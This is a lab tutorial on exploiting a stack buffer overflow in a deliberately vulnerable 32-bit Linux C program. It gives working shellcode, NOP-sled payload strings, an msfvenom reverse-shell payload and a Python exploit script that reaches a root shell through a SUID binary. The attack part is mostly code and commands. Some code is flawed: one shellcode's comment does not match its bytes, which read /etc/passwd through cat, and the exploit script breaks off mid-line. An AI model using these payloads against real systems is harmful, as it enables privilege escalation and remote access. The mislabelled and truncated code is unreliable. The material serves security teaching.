The PWN realm. Modern techniques for stack overflow exploitation

The buffer overflow vulnerability is an extremely popular topic on hackers’ forums. In this article, I will provide a universal and practically-oriented ‘introduction’ for enthusiasts studying the basics of low-level exploitation. Using stack overflow as an example, I will address a broad range of topics: from security mechanisms currently used by the GCC compiler to specific features of binary stack overflow exploits.

I bet you were taught that strcpy is an unsafe function: using it, you may run beyond the available memory limit. You were also strongly recommended to use Visual Studio instead, right? But why is strcpy unsafe? What may happen if you use it? How to exploit vulnerabilities falling under the category “Stack-Based Buffer Overflow”? See the answers below.

This article covers the following aspects:

  • protection mechanisms used in the GCC compiler and Linux OS;
  • GDB debugger in combination with PEDA toolkit;
  • analyzing assembler code compiled with various compilation options;
  • creating and testing shellcodes;
  • developing exploits for executable files vulnerable to stack overflow: overwriting the return address, injecting payload into the stack, and creating NOP sleds;
  • using kernel memory dumps to exploit the vulnerability outside of the debugging environment; and
  • analyzing the new prologue of the main function and creating an exploit that can be used if the program is compiled without the flag -mpreferred-stack-boundary=2.

overflow.c

Here is the source code written in C. The file name is overflow.c, and it implements a few simple functions: copying the string received from the user to the local buffer and displaying the buffer content on the screen. What’s wrong with it?

  • file: overflow.c
  • compilation: gcc -g -Wall -Werror -O0 -m32 -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro -mpreferred-stack-boundary=2 -o overflow overflow.c
  • run: ./overflow
#include 
#include 

int main(int argc, char* argv[]) {
  // 128-byte char array
  char buf[128];
  // copying first argument to buf array
  strcpy(buf, argv[1]);
  // displaying buffer content on the screen
  printf("Input: %s\n", buf);
  return 0;
}

Apparently, all problems stem from the strcpy function whose prototype is defined in the header file string.h.

char *strcpy (char *dst, const char *src);

strcpy

The strcpy function copies the content of the src character array (hereinafter “string”) to the dst buffer prepared in advance. So what’s the problem? The problem is that there is neither reference to the length of the initial string nor indication how it correlates with the size of the buffer allocated for it.

In most situations, the processor puts local static variables of functions into the call stack (or just “stack”); so, it is logical to assume that potential attackers will use this stack for their malicious activities: if you manage to reach beyond the legitimate memory limits, you can do almost everything. After all, “to get full control over the system, you must go beyond its boundaries.”

Compilation

Before examining the stack of this program and disassembling it, let’s see what functions are used in the course of its compilation.

I will use Ubuntu 16.04.6 (i686) and GCC compiler v. 5.4.0. The kernel version output is as follows.

$ uname -a
Linux pwn-ubuntu 4.15.0-58-generic #64~16.04.1-Ubuntu SMP Wed Aug 7 14:09:34 UTC 2019 i686 i686 i686 GNU/Linux

For the purposes of this study, I intentionally disarm the compiler by disabling all functions protecting the control-flow integrity.

$ gcc -g -Wall -Werror -O0 -m32 -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro -mpreferred-stack-boundary=2 -o overflow overflow.c

I use the following flags:

  • -g – instructs the compiler to include extra information in the output to facilitate the debugging process;
  • -Wall -Werror – displays the compiler’s warnings about potentially incorrect structures used in the program; if such structures are discovered, the warnings are turned into errors, thus, making the compilation impossible (by the way, in the above example, everything is fine; so, the compiler keeps silence);
  • -O0 – disables code optimization to maintain the experimental integrity;
  • -m32 – specifies that I need a 32-bit executable file. In this particular case, this option is not necessary because I use a 32-bit distribution, and by default, the binary file will be 32-bit, too; however, I include this flag for illustration purposes;
  • -fno-stack-protector – disables the protection against Stack Smashing attacks. This is one of the possible scenarios during the exploitation of the buffer overflow vulnerability. The protection involves a small extension of the stack space in order to place a randomly generated integer unknown to the attacker directly before the return address (this is called guard variable or canary – by analogy with canaries used to detect firedamp in mines). If this value changes directly before being returned from the function, chances are high that an outside intervention has occurred, and the returned address is either corrupted or altered. As a result, the program execution stops;
  • -z execstack – an option passed to the compiler; its key word, execstack, indicates that the instructions stored in the stack can be executed. Such a behavior was acceptable for some architectures and used for optimization purposes. However, I am going to use this feature to execute a malicious shellcode injected into the stack space;
  • -no-pie – an option indicating that I don’t want a position-independent executable file (Position Independent Execution, PIE) that uses address space layout randomization (ASLR); I will disable this feature later;
  • -Wl,-z,norelro – instructs the compiler not to mark the Global Offset Table (GOT) as Read-Only to prevent its overwriting during the assignment of values to load addresses of the shared libraries (Relocation Read-Only, RELRO);
  • -mpreferred-stack-boundary=2 – affects the alignment size for the stack frame boundary. The data structure alignment allows to increase the processor’s access speed to the memory by ‘aligning’ the stack size to a value multiple to a certain number. This number is 2^n where n is controlled by the -mpreferred-stack-boundary=n option. By default, n is equal to 4 in modern systems; in other words, GCC builds stack frames so that ESP for all program functions points to addresses multiple to 16 (2^4). Initially, I will use the value 2, and GCC will align the stack pointer to a four-byte boundary. I use this option to make the assembly code listing more readable: the introduction of 16-byte boundaries has led to the creation of a new prologue for the main function, which is extremely difficult-to-read. However, in the end of this article, I will show what exactly changes when this option is enabled and perform the exploitation without it;
  • -o overflow – the name of the output file; and
  • overflow.c – the source code to be compiled.

In fact, I don’t really need such a long list of arguments to demonstrate the stack overflow exploitation. The required minimum set includes only -fno-stack-protector и -z execstack. However, I intentionally listed as many mechanisms used by GCC to protect the executable files as possible. In the coming articles, I will address these protection concepts in more detail and show how to bypass them.

The last thing I have to do at the preparation stage is disable ASLR. This requires superuser rights and involves changes in one of the procfs kernel configuration files.

# echo 0 > /proc/sys/kernel/randomize_va_space

Stack

Let’s remember the classical scheme showing the data layout in a stack. I will use the above-mentioned vulnerable source code as an example.

Stack layout for the main overflow.c function

Stack layout for the main overflow.c function

The two key processor registers involved in the stack frame formation are ESP and EBP.

  • ESP is a general-purpose register pointing to the top of the stack at any time. As you are well aware, the stack grows downward: when an item is pushed to it, the ESP address decreases; when an item is popped out from it, the ESP address increases.
  • EBP is a general-purpose register pointing to the base of the current stack frame and used as the beginning of the reference system associated with the current frame. The EBP value changes when the function implementation begins or ends. Unlike ESP, whose value is changed by the processor, operations with EBP are performed by the running program. I can get access to any argument in the stack frame (be it a local variable or function argument) by using addressing in the format: base (EBP) + offset.

It is also necessary to note the EIP register: it points to the instruction currently executed by the processor. In fact, the return address is the saved value of the EIP register; when the function execution is completed, this value is returned by the ret instruction and used to tell the computer where to go next to execute the next command.

Assembler

Time to examine the assembler code generated by the compiler. I compile overflow.c using the above command and launch the GDB debugger.

To get the assembly code listing, I use the following one-string script.

$ gdb -batch -ex ‘file ./overflow’ -ex ‘disas main’

The -batch option indicates that the commands must be executed without initializing an interactive debugging session. They are passed as arguments of the -ex option: open the file and disassemble main. As a result, I get the following assembler code in Intel syntax.

Dump of assembler code for function main:
   0x0804841b <+0>:     push   ebp
   0x0804841c <+1>:     mov    ebp,esp
   0x0804841e <+3>:     add    esp,0xffffff80
   0x08048421 <+6>:     mov    eax,DWORD PTR [ebp+0xc]
   0x08048424 <+9>:     add    eax,0x4
   0x08048427 <+12>:    mov    eax,DWORD PTR [eax]
   0x08048429 <+14>:    push   eax
   0x0804842a <+15>:    lea    eax,[ebp-0x80]
   0x0804842d <+18>:    push   eax
   0x0804842e <+19>:    call   0x80482f0 
   0x08048433 <+24>:    add    esp,0x8
   0x08048436 <+27>:    lea    eax,[ebp-0x80]
   0x08048439 <+30>:    push   eax
   0x0804843a <+31>:    push   0x80484d0
   0x0804843f <+36>:    call   0x80482e0 
   0x08048444 <+41>:    add    esp,0x8
   0x08048447 <+44>:    mov    eax,0x0
   0x0804844c <+49>:    leave
   0x0804844d <+50>:    ret
End of assembler dump.

A similar result can be obtained using a parser of object files called objdump.

$ objdump -M intel -d ./overflow | grep ‘main’ -A19

Let’s examine the code in more detail.

0x0804841b <+0>:  push ebp
0x0804841c <+1>:  mov  ebp,esp
0x0804841e <+3>:  add  esp,0xffffff80  ; equivalent to "sub esp,0x80"

The first three lines constitute a classical prologue where the stack frame is created: the EBP value of the caller function is saved in the stack and rewritten as its current top. As a result, a so-called ‘comfort zone’ is created: I can address local instances in the universal style regardless of the function type. In addition, space is allocated here for local variables: adding the sign value 0xffffff80 to ESP is the same as deducting 128 from it (this is exactly what I need for the 128-byte buf buffer).

0x08048421 <+6>:  mov  eax,DWORD PTR [ebp+0xc]  ; eax = argv
0x08048424 <+9>:  add  eax,0x4                  ; eax = &argv[1]
0x08048427 <+12>: mov  eax,DWORD PTR [eax]      ; eax = argv[1]
0x08048429 <+14>: push eax                      ; prepare "src" argument for strcpy function 

Then the program prepares to call the strcpy function. First, the ‘source’ (i.e. the src argument from the strcpy prototype) is processed: the string sent by the user and saved in argv[1] is placed into the EAX register (the zero-indexed cell is allocated for the name of the executable file); then the register value is added to the stack. The pointer to the argv array is located at an offset of 12 (or 0xc), after the return address and the value of the argc parameter.

0x0804842a <+15>: lea  eax,[ebp-0x80]  ; eax = buf
0x0804842d <+18>: push eax            ; prepare "dst" argument for strcpy function

Then similar operations are performed, but this time, the ‘destination’ is the dst argument from the strcpy prototype: the effective address of the pointer to the beginning of the buf array is loaded to the EAX register, while the lea (load effective address) instruction is used to calculate the offset ‘on the fly’ and put it into the register.

0x0804842e <+19>: call 0x80482f0   ; strcpy(src, dst) or strcpy(buf, argv[1])
0x08048433 <+24>: add  esp,0x8                 ; clear stack of the two extreme values 4 bytes in size each

Now everything is ready: I can call the strcpy function and clear the stack of the two values that are not needed anymore: src and dst.

0x08048436 <+27>: lea  eax,[ebp-0x80]          ; eax = buf
0x08048439 <+30>: push eax                     ; prepare "buf" argument for printf function
0x0804843a <+31>: push 0x80484d0               ; prepare string in the format "Input: %s\n"
0x0804843f <+36>: call 0x80482e0   ; printf("Input: %s\n", buf)
0x08048444 <+41>: add  esp,0x8                 ; clear stack of the extreme value

Then arguments are prepared in a similar way for the function printing the inputted string on the screen.

0x08048447 <+44>: mov  eax,0x0  ; eax = 0x0

The EAX register is canonically reset to zero prior to the return from the function.

And finally, the epilogue goes. It is the epilogue that makes it possible to change the program’s behavior.

0x0804844c <+49>: leave  ; mov esp,ebp; pop ebp
0x0804844d <+50>: ret    ; eip = esp

As you can see, leave is resolved here into a chain consisting of two instructions: mov esp,ebp; pop ebp. This operation rolls back everything that was done during the stack frame creation: the top of the stack points again to the value it had contained prior to the function execution, while EBP takes again the value of the caller’s EBP. Then the ret instruction is executed: it takes the top value of the stack, assigns it to the EIP register assuming that this is the saved return address to the caller function, jumps to this address suspecting nothing wrong, and everything is supposed to be resumed to the normal course… but this is where I enter the game!

Prior to examining the exploit structure, I have to briefly describe the GDB debugging tool used to get the assembly code listing and its modifications.

GDB (PEDA)

GNU Debugger (GDB) is a portable debugger constituting a part of the GNU Project and supporting many programming languages, including C and C++. GDB uses an interactive command line interface for interactions with the user (some enthusiasts even use this tool as REPL for the C language).

Frankly speaking, I don’t feel comfortable inside the GDB environment because it doesn’t display auxiliary information in the background: you have to enter a special command for each piece of information (the current state of registers, stack contents, active breakpoints, etc.). Even though almost all commands in GDB have one-letter aliases, this is still very tiresome.

Fortunately, the PEDA (Python Exploit Development Assistance for GDB) extension comes to help. This GDB assistant is written in Python, and it makes the debugger much more user-friendly. Based on its name, you can guess that this utility is mostly used for development of exploits to binary vulnerabilities.

The extension is installed in two clicks: I clone the repository and initialize the assistant in the GDB configuration file.

$ git clone https://github.com/longld/peda.git ~/peda
$ echo “source ~/peda/peda.py” >> ~/.gdbinit

checksec

PEDA includes a wonderful module called checksec. It checks what security mechanisms are currently active for the given executable file.

PEDA checksec

PEDA checksec

  • CANARY protects the stack against overflowing; I disabled it using the -fno-stack-protector option;
  • FORTIFY is the compiler’s intellectual protection mechanism that checks functions taking as arguments unsafe data structures whose sizes are set statically (e.g. data arrays of fixed size). In the course of the security check, the compiler replaces calls to such functions with calls to their special analogues able to detect that they go beyond the boundaries of the allocated memory, and passes to them the maximum possible size of the potentially ‘unsafe’ argument. In case the protection mechanism detects overwriting of ‘forbidden’ memory, the program is immediately terminated;
  • NX is a nonexecutable stack. I disabled it using the -z execstack option;
  • PIE is a position-independent binary file. I disabled it by enabling the -no-pie option and not enabling the ASLR protection; and
  • RELRO is the ‘read-only’ mode for the GOT table. I disabled it using the -Wl,-z,norelro option.

In addition to the GDB extension, such checks can be performed using a special script.

Developing exploits

Time to overflow some stacks! The main idea of a stack overflow attack is to overwrite the return address – the above-mentioned saved value of the EIP register determining the jump after the execution of a vulnerable function. I am going to inject a malicious shellcode into the stack, calculate its address and replace the original EIP value with this address.

Calculating the EIP offset

In this particular case, I can calculate the location of the return address without using any tools – just by examining the low-level code:

[ TERM

| ... |
+-----------------+
| Return |
| address |
+-----------------+
| EBP |
+-----------------+
| buf |
+-----------------+
| Free |
| space |
+-----------------+
| ... |

Return address = buf + EBP = 128 + 4 = 132

However, it is also possible to automate this process: a unique string (pattern) of a given length is generated and fed to the vulnerable program. If I manage to overwrite the EIP this way, then it would be possible to calculate the number of bytes required to jump to the return address on the basis of this register’s new value using a simple script.

Several implementations of this approach are currently available. The first one is the pattern module embedded in PEDA. The command pattern create (where n is the required length) allows to create a unique pattern.

I run the debugger with the -q option (block the initial greeting) and generate a 200-byte string to make sure that the stack is overflowed.

Generating a unique pattern in PEDA GDB

Generating a unique pattern in PEDA GDB

Using the command run (as said above, almost all GDB commands are reduced to one letter for convenience purposes; accordingly, r equals to run), I run the program and send the generated pattern as an argument.

The run command will be executed after pressing Enter

The run command will be executed after pressing Enter

After running the program, I see the nice PEDA assistant window (‘pure’ GDB without extensions is very laconic) showing values of all important registers. Then I use the pattern module to calculate the offset as pattern offset 0x6c414150 by sending the EIP value that the register had at the time of the segmentation fault.

Calculating offset for the EIP register in PEDA GDB

Calculating offset for the EIP register in PEDA GDB

The result is 132 – so, my earlier assumption was correct.

WWW

Other implementations of such tools are available as online services (Buffer Overflow EIP Offset String Generator and Buffer overflow pattern generator) and scripts. The most popular such script is included in Metasploit.

Now I know the return address. What’s next?

There are several ways to inject my shellcode into the stack space, but I must present some theory first.

Shellcodes

In my future exploit, the payload will contain a shellcode – a set of instructions in hexadecimal form enabling me to get access to the command interpreter and/or perform other sequences of actions at my discretion.

A shellcode can be

In this particular case, I will use a shellcode 33 bytes in size for Linux x86. It resets the real and effective user identifiers for the caller process to zero (root) and launches the shell.

// setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])

"\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65"
"\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"

A simple program written in C makes it possible to test whether the shellcode is indeed executed in your system or not.

// Usage: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o test_shellcode_v1 test_shellcode_v1.c && ./test_shellcode_v1

#include 
#include 

const unsigned char shellcode[] =
  "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89"
  "\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65"
  "\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";

int main(int argc, char* argv[]) {
  printf("Shellcode size: %d\n\n", strlen((const char*)shellcode));

  int* ret;
  ret = (int*)&ret + 2;
  (*ret) = (int)shellcode;
}

The following simple logic is implemented:

  1. a pointer to an integer (ret variable) is declared; this integer will be placed in the main stack frame immediately after the saved EBP value;
  2. an 8-byte offset from this variable is used to jump to the return address (+2 places me exactly by 8 bytes further because this type of pointer occupies 4 bytes); and
  3. the return address (EIP) is overwritten with the address of my shellcode. In fact, I will perform the same operations during the stack overflow exploitation – but this time, I do this ‘legitimately’.

Alternatively, I can use another code written in C that interprets the array containing the shellcode as a function – so, I just ‘call’ this ‘function’.

// Usage: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o test_shellcode_v2 test_shellcode_v2.c && ./test_shellcode_v2

#include 
#include 

const unsigned char shellcode[] =
  "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89"
  "\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65"
  "\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";

int main(int argc, char* argv[]) {
  printf("Shellcode size: %d\n\n", strlen((const char*)shellcode));

  void (*fp)(void);
  fp = (void*)shellcode;
  fp();
}

You can use any of these two variants.

Payload before the ESP

GDB allows to use Python scripts in the interactive mode to simplify the debugging process; so, I use a simple Python command to double-check that I can rewrite the EIP value at my discretion.

Using the break command, I set a breakpoint at the ret instruction (its address is 0x0804844d, see the assembly code listing).

gdb-peda$ b *0x0804844d

Then I run the program and send as an argument a string consisting of 132 letters A (junk used to get to the return address) concatenated with a sinister value: 0xd34dc0d3 (dead code). Keeping the little-endian in mind, I reverse the string containing the address using the Python slicing mechanism: [::-1].

gdb-peda$ r `python -c 'print "A"*132 + "\xd3\x4d\xc0\xd3"[::-1]'`

Checking values of the registers at the breakpoint set before ret

Checking values of the registers at the breakpoint set before ret

Because the program stopped before the execution of the ret instruction, the ‘dead code’ value is on top of the stack (marked by the red frame) – i.e. in ESP, from where it was supposed to be sent to the EIP register if I hadn’t interrupted the program execution. Also note that the EIP value is now equal to the breakpoint address (marked by the blue frame).

Using the x (examine) command, you can review in more detail any memory section (for instance, what’s currently going on at the beginning of the stack frame ($esp-132)) and lay out its space in your mind to get a better understanding of how the shellcode would ‘lay’ on the stack. After the slash, I specify the desired output format: 64wx (64 4-byte words (w) in hexadecimal form (x)).

gdb-peda$ x/64wx $esp-132

Expected stack layout after injecting the shellcode

Expected stack layout after injecting the shellcode

Let’s examine the above screenshot in more detail.

  • So far, everything located before the 0xd34dc0d3 value shown in the red frame is junk consisting of letters A that will be replaced by more meaningful stuff soon.
  • The orange frame marks the area where the shellcode (33 bytes) will be placed. Note that the least significant byte will be ‘absorbed’ by the last word (address 0xbfffee18) because I use the little endian byte order.
  • The shellcode is surrounded by two areas, 32 bytes each, marked by blue frames – so-called NOP sleds. They are used to avoid the need to calculate the shellcode address to an accuracy of one byte: the segments consisting of NOP instructions (no operation, code 0x90 for the Intel x86 architecture) that request the processor to do nothing can be used by attackers who ‘jump’ to such a segment and ‘sled’ to the shellcode location. As a result, the chance to specify a wrong address decreases, and the payload is executed in any case. In addition, it is often impossible in modern systems to set a static address unambiguously by calculating it once: it won’t remain the same at the next launch of the program (because of ASLR and specific features of the compiler’s behavior during the stack alignment, see below). The NOP area after the shellcode just fills the free space (similar to the junk consisting of letters A) enabling me to reach to the required value. In addition, it is considered good style to leave a small NOP sled immediately after the shellcode injection (provided that there is enough free space) in case the shellcode execution requires some additional space.
  • The green frame marks the stack portion filled with A junk characters.

    35 bytes = (EBP + buf) - NOP_sled*2 - Shellcode = (128 + 4) - 32*2 - 33
    

Using the continue command, I resume the program execution, trigger the ret instruction – and the program expectedly crashes due to a segmentation fault, while the return address miraculously becomes 0xd34dc0d3.

gdb-peda$ c

Program execution continues

Program execution continues

Time to launch the offensive. A crude exploit to be run in the GDB interactive shell looks as shown below (later, I am going to do this in an elegant way and without the need to run a debugger).

gdb-peda$ r `python -c 'print "\x90"*32 + "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*32 + "A"*35 + "\xbf\xff\xed\xe8"[::-1]'`

The address that overwrites the EIP is 0xbfffede8: I jump right in the middle of the NOP sled (see the stack layout screenshot).

Now I change the owner of the executable file and the group to root, set a SUID bit for it to ensure that the call of setreuid(0,0) (from the shellcode) takes effect, and execute the above command in the debugger.

$ sudo chown root overflow
$ sudo chgrp root overflow
$ sudo chmod +s overflow

Spawning the shell and executing the id command

Spawning the shell and executing the id command

So, I created a new process, and the /bin/dash shell is running in it. By the way, in Debian and Ubuntu, dash replaces the time-honored /bin/sh, which, in turn, has transformed into a symlink to /bin/dash).

After executing the id command, I see that I still have only the user rights: the point is that GDB ignores the SUID bit unless GDB itself was launched on behalf of root. Therefore, to get a superuser session, I have to perform the exploitation without using the debugger.

Payload after the ESP

If there were not enough memory to place the shellcode within the ‘officially’ allocated buffer of the buf array, I could try to grab a piece of no man’s memory located outside the stack top. However, this is very situational: the size of the memory area that can be used without causing severe consequences is unpredictable and depends on the current state of the PC.

For instance, if I transmit a string consisting of 1000 additional bytes after rewriting the return address, I will see an error of unknown nature related to the ptmalloc_init function.

An error after rewriting memory outside of the stack space

An error after rewriting memory outside of the stack space

This happened because I have brazenly entered a memory area used by other functions and started overwriting their values with my own data. GDB uses auxiliary libraries to display more informative error messages when the program crashes. I temporary disable these libraries (in my particular case, they aren’t really necessary) and see that the shared C libc library containing standard functions complains that I manipulate with the memory already used by it.

gdb-peda$ show debug-file-directory // checking what directory contains libraries with debugging information
The directory where separate debug symbols are searched for is "/usr/lib/debug".
gdb-peda$ set debug-file-directory // temporary disabling it

An error after rewriting memory outside of the stack space (libc)

An error after rewriting memory outside of the stack space (libc)

Using the trail-and-error method, I find out that nothing wrong happens if I overwrite 160 bytes outside of the stack.

gdb-peda$ r `python -c 'print "A"*132 + "\xd3\x4d\xc0\xd3"[::-1] + "B"*160'`

The program doesn't crash when I write 160 bytes outside of the stack

The program doesn’t crash when I write 160 bytes outside of the stack

Out of the academic interest, I am going to generate a payload using MSFvenom framework included in Metasploit and examine the stack layout after injecting my shellcode this way.

First, I switch to Kali to review the list of available payloads for Linux x86 that don’t use meterpreter (because I cannot use it in Ubuntu).

List of payloads without meterpreter for Linux x86

List of payloads without meterpreter for Linux x86

I select linux/x86/shell_reverse_tcp, specify the localhost on port 1337 as the victim, encode the reverse shell with x86/shikata_ga_nai to increase its size, and generate the payload.

root@kali:~# msfvenom -p linux/x86/shell_reverse_tcp -e x86/shikata_ga_nai -a x86 –platform linux LHOST=127.0.0.1 LPORT=1337 -f c
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] =
"\xbe\xaf\x6c\xe1\x7e\xd9\xe5\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\x12\x83\xc7\x04\x31\x77\x0e\x03\xd8\x62\x03\x8b\x17\xa0\x34"
"\x97\x04\x15\xe8\x32\xa8\x10\xef\x73\xca\xef\x70\xe0\x4b\x40"
"\x4f\xca\xeb\xe9\xc9\x2d\x83\x96\x29\xce\x52\x01\x28\xce\x51"
"\xe8\xa5\x2f\xe9\x6c\xe6\xfe\x5a\xc2\x05\x88\xbd\xe9\x8a\xd8"
"\x55\x9c\xa5\xaf\xcd\x08\x95\x60\x6f\xa0\x60\x9d\x3d\x61\xfa"
"\x83\x71\x8e\x31\xc3";

As a one-line Python script, my exploit looks as follows

python -c 'print "A"*132 + "\xbf\xff\xed\xcc"[::-1] + "\x90"*32 + "\xbe\xaf\x6c\xe1\x7e\xd9\xe5\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x12\x83\xc7\x04\x31\x77\x0e\x03\xd8\x62\x03\x8b\x17\xa0\x34\x97\x04\x15\xe8\x32\xa8\x10\xef\x73\xca\xef\x70\xe0\x4b\x40\x4f\xca\xeb\xe9\xc9\x2d\x83\x96\x29\xce\x52\x01\x28\xce\x51\xe8\xa5\x2f\xe9\x6c\xe6\xfe\x5a\xc2\x05\x88\xbd\xe9\x8a\xd8\x55\x9c\xa5\xaf\xcd\x08\x95\x60\x6f\xa0\x60\x9d\x3d\x61\xfa\x83\x71\x8e\x31\xc3" + "\x90"*32 + "A"'

After the shellcode injection, the stack looks as shown below:

Stack layout after the shellcode injection

Stack layout after the shellcode injection

The picture is similar to the stack layout shown on the first screenshot, but this time, the payload is located after the ESP. However, I still ‘jump’ exactly in the middle of the NOP sled preceding the shellcode (at the address 0xbfffedcc), and the green frame again marks the stack portion filled with junk A characters:

1 byte = available_memory_after_ESP - NOP_sled*2 - shellcode = 160 - 32*2 - 95

I start a local listener on port 1337, run the program, send the malicious string as input, and get the desired shell.

nc communicates with the shell on port 1337

nc communicates with the shell on port 1337

Exploit without GDB

If the program runs not in the debugger, addresses of the used memory are displaced, and the malicious string won’t work until I correct the return address. I use the kernel dump to find out the new value of this address.

Starting from version 16.04, Ubuntu by default uses the terrible Apport service to generate crash reports, including kernel dumps. I call it terrible because this service doesn’t allow to configure dumps in a traditional way. Therefore, I get rid of it first.

$ sudo vi /etc/default/apport # set the “enabled” value to “0”
$ sudo systemctl stop apport

Then I slightly alter the standard format for the dumping procedure (the first three commands must be executed on behalf of su).

# echo 1 > /proc/sys/kernel/core_uses_pid
# echo ‘/tmp/core-%e-%s-%u-%g-%p-%t’ > /proc/sys/kernel/core_pattern
# echo 2 > /proc/sys/fs/suid_dumpable
$ ulimit -c unlimited

Let’s go through the above commands line-by-line.

  1. enabling unlimited size of generated dump files;
  2. adding the process PID to the dump file name;
  3. changing the general dump file name template (the descriptions of possible formats are available in the core manual); and
  4. enabling the dump of executable files with the SUID bit set.

I use Python to crash the program (this time, from the terminal) by sending as input the above-mentioned diagnostic string where the dead code acts as the return address.

$ ./overflow python -c 'print "A"*132 + "\xd3\x4d\xc0\xd3"[::-1]'
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAM
Segmentation fault (memory dumped)

In accordance with the selected template, the dump is saved in the/tmp directory. I run the debugger and specify the path to the dump file.

$ gdb ./overflow /tmp/core-overflow-11-1000-1000-8767-1568120200 -q

Then I repeat the manipulations described above (when I was calculating the shellcode location for the first time). In this particular case, in order to ‘jump’ again in the middle of the NOP sled located before the shellcode, I have to change the return address to 0xbfffee2c.

Now I have everything I need to create an elegant script and PWN the vulnerability.

#!/usr/bin/env python
## -*- coding: utf-8 -*-

## Usage: python exploit.py

import struct
from subprocess import call


def little_endian(num):
  """Formatting the address as little-endian."""
  return struct.pack('

By default, the exploit will automatically call the program with the required argument. However, if I want to inject the malicious code manually, all I have to do is comment out the 7th string of the script containing the import of call.

$ python exploit.py
Input: jFX111j
XRh//shh/binRSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# id
uid=0(root) gid=1000(snovvcrash) groups=1000(snovvcrash),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

As you remember, I have earlier set a SUID bit on my binary file; now this enables me to get a shell with root privileges without using sudo.

The second version of Python is optimal for such scripts due to its specific encoding features for the string data type. In addition, the most popular module for exploitation of binary vulnerabilities, pwntools, is written in Python 2 as well. Too bad, pwntools does not work on 32-bit distributions; so, I set it aside for now.

Bypassing new prologue of the main function

While preparing this article, I noticed that one of the most frequently asked questions from people studying stack overflow relates to the (relatively) new prologue of the main function in the GCC compiler for Linux introduced due to the need to align the stack to a 16-byte boundary (which is required for correct operation of the SSE2 instruction set).

I could not find a suitable example of code for stack overflow demonstration under such conditions; so, let's examine the assembly code generated when the default alignment is not changed during the compilation (i.e. the -mpreferred-stack-boundary flag is not used) and develop an exploit for it.

Theory

If the flag -mpreferred-stack-boundary=2 (see the beginning of the article) is not used, the result will be the same as if the -mpreferred-stack-boundary=4 flag is in place - i.e. the stack frame of the main function will be aligned to 16 bytes.

I recompile the program and request the assembly code listing.

$ gcc -g -Wall -Werror -O0 -m32 -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro -o overflow overflow.c
$ gdb -batch -ex 'file ./overflow' -ex 'disas main'

Dump of assembler code for function main:
   0x0804841b <+0>:     lea    ecx,[esp+0x4]
   0x0804841f <+4>:     and    esp,0xfffffff0
   0x08048422 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048425 <+10>:    push   ebp
   0x08048426 <+11>:    mov    ebp,esp
   0x08048428 <+13>:    push   ecx
   0x08048429 <+14>:    sub    esp,0x84
   0x0804842f <+20>:    mov    eax,ecx
   0x08048431 <+22>:    mov    eax,DWORD PTR [eax+0x4]
   0x08048434 <+25>:    add    eax,0x4
   0x08048437 <+28>:    mov    eax,DWORD PTR [eax]
   0x08048439 <+30>:    sub    esp,0x8
   0x0804843c <+33>:    push   eax
   0x0804843d <+34>:    lea    eax,[ebp-0x88]
   0x08048443 <+40>:    push   eax
   0x08048444 <+41>:    call   0x80482f0 
   0x08048449 <+46>:    add    esp,0x10
   0x0804844c <+49>:    sub    esp,0x8
   0x0804844f <+52>:    lea    eax,[ebp-0x88]
   0x08048455 <+58>:    push   eax
   0x08048456 <+59>:    push   0x80484f0
   0x0804845b <+64>:    call   0x80482e0 
   0x08048460 <+69>:    add    esp,0x10
   0x08048463 <+72>:    mov    eax,0x0
   0x08048468 <+77>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x0804846b <+80>:    leave
   0x0804846c <+81>:    lea    esp,[ecx-0x4]
   0x0804846f <+84>:    ret
End of assembler dump.

Let's examine its individual sections. First, I see that the prologue has increased in comparison with the old variant and now consists of seven strings.

0x0804841b <+0>:  lea  ecx,[esp+0x4]        ; backup original ESP value in ECX
0x0804841f <+4>:  and  esp,0xfffffff0       ; align
0x08048422 <+7>:  push DWORD PTR [ecx-0x4]  ; save return address
0x08048425 <+10>: push ebp
0x08048426 <+11>: mov  ebp,esp
0x08048428 <+13>: push ecx                  ; save original ESP value
0x08048429 <+14>: sub  esp,0x84

The main difference is in the instruction and esp,0xfffffff0 that aligns the top of the stack making it multiple of 16. In other words, the ESP has been brutally transformed; so, how to restore its original value in the epilogue?

For that purpose, the original value is copied to the ECX register and saved twice in the stack.

